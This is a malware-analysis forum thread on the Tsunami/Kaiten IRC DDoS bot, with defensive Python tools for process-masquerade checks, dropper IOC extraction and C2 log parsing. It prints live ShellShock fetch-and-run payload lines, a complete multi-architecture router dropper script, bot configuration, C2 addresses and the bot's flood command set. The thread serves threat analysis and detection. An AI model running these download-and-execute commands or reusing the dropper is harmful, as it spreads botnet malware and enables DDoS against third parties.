A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23998  by unixfreaxjp
 Sat Sep 27, 2014 11:47 pm
More: https://www.virustotal.com/en/file/3caf ... 411856827/
#CNC: linksys,secureshellz,net, IRC channel = "#shellshock" < a PoC designed for the ShellShock event

Source: #shellshock attack payloads:
Code:
wget http://stablehost.us/bots/a -O /tmp/a;
curl -o /tmp/a http://stablehost.us/bots/a;
chmod +x /tmp/a;
/tmp/a; 
IRC server:
Code:
#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apache2" // What you want this to hide as
#define CHAN "#shellshock" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=1; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
"linksys.secureshellz.net",
(void*)0
}; 
Attachments: 7z/infected (319.96 KiB)
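The FAKENAME "apache2" define in the config above is what makes the bot show up under a legitimate-looking name in `ps`, while the ShellShock payload drops the actual file as /tmp/a. A live-response check for that kind of masquerade, as an added example (mine, not from the original post and not Kaiten code): compare the argv[0] and comm that /proc reports against the binary the kernel is actually executing (/proc/<pid>/exe), and flag executables launched from scratch directories or unlinked after exec. It assumes Linux /proc semantics and that the hiding is done by overwriting argv[0], as in the publicly circulated Kaiten source; the ProcInfo records used in the test are constructed, and the /proc walk only runs when the file is executed as a script.

```python
import os
from dataclasses import dataclass
from typing import List, Tuple

# Scratch locations where droppers such as the ShellShock payload above land binaries.
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/var/run", "/run")


@dataclass
class ProcInfo:
    pid: int
    comm: str       # /proc/<pid>/comm: kernel-side name, at most 15 chars
    cmdline: bytes  # /proc/<pid>/cmdline: NUL-separated argv, what `ps` shows
    exe: str        # readlink(/proc/<pid>/exe): the file actually executing


def under_scratch_dir(path: str) -> bool:
    return any(path == d or path.startswith(d + "/") for d in SCRATCH_DIRS)


def classify(p: ProcInfo) -> List[str]:
    """Return human-readable findings for one process (empty list = nothing odd)."""
    findings = []
    argv0 = p.cmdline.split(b"\0", 1)[0].decode("utf-8", "replace")
    shown = os.path.basename(argv0)
    deleted = p.exe.endswith(" (deleted)")
    real_path = p.exe[: -len(" (deleted)")] if deleted else p.exe
    real = os.path.basename(real_path)
    # argv[0] overwrite is how FAKENAME-style hiding works: `ps` prints 'apache2'
    # while the kernel still knows the file is /tmp/a. A mismatch on its own is
    # noisy (interpreters, busybox applets, setproctitle users), so treat it as a
    # weak signal and the scratch-dir / deleted-exe findings as the strong ones.
    if shown and real and shown != real:
        findings.append(f"argv[0] '{shown}' does not match exe '{real}'")
    if p.comm and real and p.comm != real[:15]:
        findings.append(f"comm '{p.comm}' does not match exe '{real}'")
    if under_scratch_dir(real_path):
        findings.append(f"exe runs from a scratch directory: {real_path}")
    if deleted:
        findings.append("exe was unlinked after exec (self-deleting dropper)")
    return findings


def scan_proc() -> List[Tuple[ProcInfo, List[str]]]:
    """Walk /proc and return every process with at least one finding."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # kernel thread, process already gone, or not ours to read
        if not cmdline:
            continue  # kernel threads have an empty cmdline
        p = ProcInfo(pid, comm, cmdline, exe)
        findings = classify(p)
        if findings:
            hits.append((p, findings))
    return hits


if __name__ == "__main__":
    for proc, notes in scan_proc():
        print(f"pid {proc.pid} comm={proc.comm!r} exe={proc.exe!r}")
        for note in notes:
            print("   -", note)
```

Run it as root on a suspect box so /proc/<pid>/exe is readable for every process; a bot started as `/tmp/a` that rewrote argv[0] to `apache2` shows up with both the name mismatch and the scratch-directory finding.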
 #24030  by unixfreaxjp
 Thu Oct 02, 2014 3:20 am
The Tsunami (Kaiten) "pan" attack is completely revealed; the function's source code was snagged successfully.
Attached is the function's source code, not the whole code.
Shared ONLY with the legit members (whose security we trust is handled by kernelmode management),
for the purpose of mitigating this attack method.

#MalwareMustDie!
Attachments: 7z/infected (2.21 KiB)
 #24138  by K_Mikhail
 Tue Oct 14, 2014 11:32 am
_http://128.199.179.103/private/auto/xtk-ppc-auto
_http://128.199.179.103/private/auto/xtk-mips-auto
_http://128.199.179.103/private/auto/xtk-mipsel-auto
_http://128.199.179.103/private/auto/xtk-x64-auto
_http://128.199.179.103/private/auto/xtk-arm-auto

x86 is absent.
Attachments: pw: infected (44.21 KiB)
 #24142  by unixfreaxjp
 Tue Oct 14, 2014 1:39 pm
Spotting a skids' lair with old museum samples... thinking three times before deciding to share here...
(screenshot in the original post)
https://www.virustotal.com/en/file/de5b ... 413070953/
https://www.virustotal.com/en/file/0732 ... 343929536/
https://www.virustotal.com/en/file/0a32 ... 413293556/
Compiled well for each kernel version... 2.7? lol, outdated.
Attachments: 7z/infected (10.63 KiB)
 #26826  by malwarelabs
 Mon Sep 28, 2015 12:15 pm
Good old Tsunami
Vector: SSH bruteforce:
Code:
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
#
# LEGAL DISCLAIMER: It is the end user's responsibility to obey 
# all applicable local, state and federal laws. Developers assume 
# no liability and are not responsible for any misuse or damage 
# caused by this program.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="hXXp://freshtoastmafia.com"
# NAME OF BINARIES:
REFERENCE_MIPSEL="3"
REFERENCE_MIPS="2"
REFERENCE_SUPERH="5"
REFERENCE_ARM="1"
REFERENCE_PPC="4"
rm -fr /var/run/${REFERENCE_MIPSEL} \
	/var/run/${REFERENCE_MIPS} \
	/var/run/${REFERENCE_SUPERH} \
	/var/run/${REFERENCE_ARM} \
	/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh
hXXp://freshtoastmafia.com -> "NAZI BOOTER" admin : hXXps://twitter.com/ispdestroyer
C&C 80.82.75.56:6667
attached
Attachments: infected (66.42 KiB)
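Dropper scripts like the getbinaries.sh above are the fastest source of IOCs in a Tsunami incident: one HTTP base, one filename per architecture, one drop path per fetch. Below is an added example (mine, not part of the original post) that triages such a script offline: it resolves the REFERENCE_* shell variables, pulls every wget/curl fetch out of the command chains, reconstructs the full URL and on-disk destination, and guesses the target architecture from the variable name or filename. The embedded SAMPLE is constructed in the shape of the posted script (hXXp left defanged) with one line in the shape of the ShellShock wget/curl payload from earlier in the thread, so it also covers the `-O`/`-o` destination style; the architecture guess is a substring heuristic and is an assumption, not something the script itself declares.

```python
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the posted getbinaries.sh plus one ShellShock-style line.
SAMPLE = r'''#!/bin/sh
# YOUR HTTPD SERVER:
REFERENCE_HTTP="hXXp://freshtoastmafia.com"
# NAME OF BINARIES:
REFERENCE_MIPSEL="3"
REFERENCE_MIPS="2"
REFERENCE_ARM="1"
rm -fr /var/run/${REFERENCE_MIPSEL} /var/run/${REFERENCE_MIPS} /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget http://stablehost.us/bots/a -O /tmp/a; curl -o /tmp/a http://stablehost.us/bots/a; chmod +x /tmp/a; /tmp/a;
'''

ASSIGN = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)=(["\']?)(.*?)\2\s*$')  # NAME="value" / NAME=value
VAR = re.compile(r'\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?')                    # $NAME or ${NAME}
FETCH = re.compile(r'\b(wget|curl)\b([^;&|\n]*)')                        # one fetch up to ; && | ||
URL = re.compile(r'(?i)^h(?:tt|xx)ps?://')                               # accepts defanged hXXp too
# Heuristic only: order matters so 'mipsel' wins over 'mips', 'x86_64' over 'x86'.
ARCH_TOKENS = ("mipsel", "mips", "superh", "sh4", "arm", "ppc", "x86_64", "x64", "x86", "i586", "i686")


def expand(s: str, env: Dict[str, str]) -> str:
    """Substitute $VAR / ${VAR} from env; unknown names are left untouched."""
    return VAR.sub(lambda m: env.get(m.group(1), m.group(0)), s)


def parse_assignments(script: str) -> Dict[str, str]:
    """Collect simple NAME=value lines in order, expanding earlier variables."""
    env: Dict[str, str] = {}
    for line in script.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = expand(m.group(3), env)
    return env


def guess_arch(raw_line: str, url: str) -> Optional[str]:
    """Look for an architecture token in the variable names used or the URL filename."""
    hay = " ".join(VAR.findall(raw_line)).lower() + " " + url.rsplit("/", 1)[-1].lower()
    for token in ARCH_TOKENS:
        if token in hay:
            return token
    return None


def extract_fetches(script: str, env: Dict[str, str]) -> List[dict]:
    """Return one record per wget/curl invocation: tool, full URL, drop path, arch guess."""
    found = []
    for raw in script.splitlines():
        line = expand(raw, env)
        for m in FETCH.finditer(line):
            tool, args = m.group(1), m.group(2).split()
            url = next((a for a in args if URL.match(a)), None)
            if url is None:
                continue
            dest = None
            for i, a in enumerate(args[:-1]):
                if a in ("-O", "-o"):          # explicit output file (wget -O / curl -o)
                    dest = args[i + 1]
                elif a == "-P":                # wget directory prefix: keeps the URL basename
                    dest = args[i + 1].rstrip("/") + "/" + url.rsplit("/", 1)[-1]
            found.append({"tool": tool, "url": url, "dest": dest, "arch": guess_arch(raw, url)})
    return found


def report(script: str) -> List[dict]:
    return extract_fetches(script, parse_assignments(script))


if __name__ == "__main__":
    for f in report(SAMPLE):
        print(f"{f['tool']:5} {f['arch'] or '?':7} {f['url']} -> {f['dest']}")
```

The drop paths are what you hunt for on the devices (here /var/run/1, /var/run/2, /var/run/3 and /tmp/a), and the URLs are what you block or sinkhole; variables assigned after their use, or built with command substitution, are left unexpanded rather than guessed.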
 #27285  by unixfreaxjp
 Sun Nov 22, 2015 3:11 pm
Too modified, not good. Must make some new memo here. IRC CnC server (plain) & ports (hashed) are well seen as usual in the bins... I go with interesting points only. Samples:
https://www.virustotal.com/en/file/26ac ... 448201213/
https://www.virustotal.com/en/file/ec6b ... 448201238/
Installer: (screenshot in the original post)
shell pong:
Code:
$ echo -e "\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n\r\n"
binfagt'
new help:
Code:
NOTICE %s :PAN <target> <port> <secs>\n
NOTICE %s :Panning %s.\n 
NOTICE %s :TSUNAMI <target> <secs>\n 
NOTICE %s :Tsunami heading for %s.\n 
NOTICE %s :UNKNOWN <target> <secs>\n 
NOTICE %s :Unknowning %s.\n
NOTICE %s :MOVE <server>\n 
NOTICE %s :TSUNAMI <target> <secs>= Special packeter that wont be blocked by most firewalls\n
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n
NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n
NOTICE %s :NTP <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time> = A NTP flooder\n 
NOTICE %s :UNKNOWN <target> <secs>= Another non-spoof udp flooder\n
NOTICE %s :SCAN= TheMaTriX Telnet Spreader\n 
NOTICE %s :HTTPFLOOD <IP> <HOST> <METHOD> <PAGE> <TIME>= TheMaTriX HTTP FLOODER\n
NOTICE %s :NICK <nick>= Changes the nick of the client\n 
NOTICE %s :SERVER <server>= Changes servers\n
NOTICE %s :GETSPOOFS= Gets the current spoofing\n
NOTICE %s :SPOOFS <subnet>= Changes spoofing to a subnet\n 
NOTICE %s :DISABLE= Disables all packeting from this client\n
NOTICE %s :ENABLE = Enables all packeting from this client\n 
NOTICE %s :KILL = Kills the client\n 
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n
NOTICE %s :VERSION= Requests version of client\n 
NOTICE %s :KILLALL= Kills all current packeting\n
NOTICE %s :HELP = Displays this\n
NOTICE %s :IRC <command>= Sends this command to the server\n 
NOTICE %s :SH <command> = Executes a command\n 
Wide variety of user-agents used for the DDoS attack (screenshot in the original post).
Pan flood attack (screenshot).
NTP flood attack (screenshot).
Most important new thing is this telnet scanner (screenshot):
just saying:
Code:
0x8048A96 mov     dword ptr [esp+4], offset aR ; "r"
0x8048A9E mov     dword ptr [esp], offset aUsrDictWords ; "/usr/dict/words"
0x8048AA5 call    fopen
0x8048AAA mov     [ebp+var_14], eax
0x8048AAD cmp     [ebp+var_14], 0
and..
Code:
NOTICE #Daddy2 :[+] Cracked IP %s with login %s:%s\n 
#MalwareMustDie / @unixfreaxjp
Attachments: 7z/infected (73.18 KiB)
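The HELP text above is effectively the bot's C2 grammar: every flood order is a PRIVMSG with a fixed argument layout, and the telnet spreader reports stolen logins back to the channel as a NOTICE. Below is an added example (mine, not from the original post and not Kaiten code) that turns that grammar into detection logic over IRC log lines: it parses orders into structured events tagged as ddos / spread / exec / control, extracts the "[+] Cracked IP" credential leaks, and recognises the "Panning ..." style acknowledgements. The sample log lines are constructed; the parameter names are mine, and the "!*" / "!nick" addressing prefix in front of each command is an assumption based on the public Kaiten source, as the help text itself does not show it.

```python
import re
from typing import Dict, List, Optional

# Argument layout taken from the bot's HELP text; parameter names are mine.
# A trailing '...' marks a parameter that swallows the rest of the line.
COMMANDS: Dict[str, List[str]] = {
    "PAN": ["target", "port", "secs"],
    "TSUNAMI": ["target", "secs"],
    "UNKNOWN": ["target", "secs"],
    "UDP": ["target", "port", "secs"],
    "NTP": ["target", "port", "reflection_file", "threads", "pps_limit", "secs"],
    "HTTPFLOOD": ["ip", "host", "method", "page", "secs"],
    "SCAN": [],
    "MOVE": ["server"], "SERVER": ["server"], "NICK": ["nick"],
    "SPOOFS": ["subnet"], "GETSPOOFS": [],
    "DISABLE": [], "ENABLE": [], "KILL": [], "KILLALL": [],
    "GET": ["url", "save_as"], "VERSION": [], "HELP": [],
    "IRC": ["command..."], "SH": ["command..."],
}
FLOODS = {"PAN", "TSUNAMI", "UNKNOWN", "UDP", "NTP", "HTTPFLOOD"}

# ":prefix CMD target :trailing" is the only IRC shape we care about here.
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Z]+)\s+(?P<target>\S+)\s+:(?P<text>.*)$")
CRACKED = re.compile(r"\[\+\] Cracked IP (?P<ip>\S+) with login (?P<user>[^:\s]+):(?P<pw>\S*)")
ACK = re.compile(r"^(?:Panning|Tsunami heading for|Unknowning) (?P<target>\S+?)\.?$")

# Constructed sample lines (documentation addresses only).
SAMPLE_LOG = [
    ":skid!x@203.0.113.7 PRIVMSG #shellshock :!* PAN 198.51.100.23 80 120",
    ":skid!x@203.0.113.7 PRIVMSG #shellshock :!* NTP 198.51.100.23 80 ntp.txt 4 -1 60",
    ":skid!x@203.0.113.7 PRIVMSG #shellshock :!apache2 SH wget http://stablehost.us/bots/a -O /tmp/a",
    ":skid!x@203.0.113.7 PRIVMSG #shellshock :!* SCAN",
    ":bot!u@198.51.100.9 NOTICE #Daddy2 :[+] Cracked IP 192.0.2.44 with login root:admin",
    ":bot!u@198.51.100.9 NOTICE #shellshock :Panning 198.51.100.23.",
    ":someone!u@h PRIVMSG #shellshock :hello everyone",
    "PING :irc.example",
]


def kind_of(name: str) -> str:
    if name in FLOODS:
        return "ddos"
    if name == "SCAN":
        return "spread"
    if name in ("SH", "GET"):
        return "exec"
    return "control"


def parse_line(line: str) -> Optional[dict]:
    """Return a structured event for a C2 order, credential leak or ack, else None."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    prefix, cmd, target, text = m.group("prefix", "cmd", "target", "text")
    ev = {"sender": prefix.split("!", 1)[0] if prefix else None, "channel": target}
    if cmd == "PRIVMSG" and text.startswith("!"):
        tok = text.split()
        if len(tok) < 2 or tok[1].upper() not in COMMANDS:
            return None
        name, args = tok[1].upper(), tok[2:]
        spec = COMMANDS[name]
        if spec and spec[-1].endswith("..."):
            fixed = spec[:-1]
            params = dict(zip(fixed, args))
            params[spec[-1][:-3]] = " ".join(args[len(fixed):])
        else:
            params = dict(zip(spec, args))
        ev.update(type="order", addressed_to=tok[0][1:], command=name, kind=kind_of(name),
                  params=params, complete=len(args) >= len(spec))
        return ev
    if cmd == "NOTICE":
        c = CRACKED.search(text)
        if c:
            ev.update(type="cred_leak", victim=c["ip"], user=c["user"], password=c["pw"])
            return ev
        a = ACK.match(text)
        if a:
            ev.update(type="ack", target=a["target"])
            return ev
    return None


def events_from_log(lines) -> List[dict]:
    return [e for e in (parse_line(l) for l in lines) if e]


if __name__ == "__main__":
    for e in events_from_log(SAMPLE_LOG):
        print(e)
```

Fed with the raw IRC stream from a sinkholed or sniffed CNC session, the "order" events give you the victims and durations to notify about and the "cred_leak" events give you the devices that have already fallen to the telnet bruter.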
 #27484  by wiseman
 Tue Dec 29, 2015 10:55 am
unixfreaxjp wrote:Most important new thing is this telnet scanner (screenshot):
just saying:
Code:
0x8048A96 mov     dword ptr [esp+4], offset aR ; "r"
0x8048A9E mov     dword ptr [esp], offset aUsrDictWords ; "/usr/dict/words"
0x8048AA5 call    fopen
0x8048AAA mov     [ebp+var_14], eax
0x8048AAD cmp     [ebp+var_14], 0
and..
Code:
NOTICE #Daddy2 :[+] Cracked IP %s with login %s:%s\n 
#MalwareMustDie / @unixfreaxjp
That's hardly a major improvement over the existing Kaiten. I mean, when you consider that the vast majority of modern *nixes don't even come with telnet out of the box any more...
It's more likely to be a threat against routers or other small embedded devices, but then that'd involve compiling a bunch of different kaitens, etc etc, and with the router malware world heating up with gayfgt and LightAidra and the .xs malware, I can't imagine it's a big deal.
I haven't looked at it yet, but if it's just posting the login details as opposed to auto-spreading, then that's also not a huge risk.
I guess he might be able to own a few unusual embedded devices out there, but if he's using Kaiten in this day and age then he's really only a threat to himself.
 #27547  by unixfreaxjp
 Tue Jan 05, 2016 8:38 am
I don't know who you are, but thanks for sharing your thoughts, I appreciate it.
wiseman wrote:
unixfreaxjp wrote:Most important new thing is this telnet scanner...
That's hardly a major improvement over the existing Kaiten.
Oh, I agree with you perfectly, and I didn't say it was majorly improved, but they added a services bruter/scanner to aim at the right spot after all; I also spotted ones with the SSH bruter too, which is why I called it an "important new thing".
The IoT weakness of "this and that" made new vectors of "this and that" seen and aimed at. Some devices are targeted with this now, and they are compiled in many variants.
wiseman wrote:I guess he might be able to own a few unusual embedded devices out there, but if he's using Kaiten in this day and age then he's really only a threat to himself.
I jumped into its IRC CNC and into some "ugly environment" to trail ELF threats/actors closely. Sadly, I saw hundreds (maybe up to a couple of thousand nodes tops in the overall total of groups that are using it, like lizard-stresser, kaitenbbot, etc.) of DDoS botnets that are in routers now, because they have a generic flaw. I may say it is close to a 50-50 split of old machines/VPS vs. the router ones. They use routers/IoT to brute each other's login passwords now, and this is the escalation factor that needs to be known.

So it's not a few anymore, and most of them are from the Kaiten family. Seriously, it hits; not that I'm happy about it. As for the code itself, it grows, into new variants like the gayfgt you mentioned (they call it lizkebab; it has at least 6 codes by now), dtool, and some more. Those kiddos work hard to improve & expand their bruter/DDoS service.
I shared its source codes and anything I could grab and distributed them to all of the security industry I could reach: http://blog.malwaremustdie.org/2015/11/ ... osure.html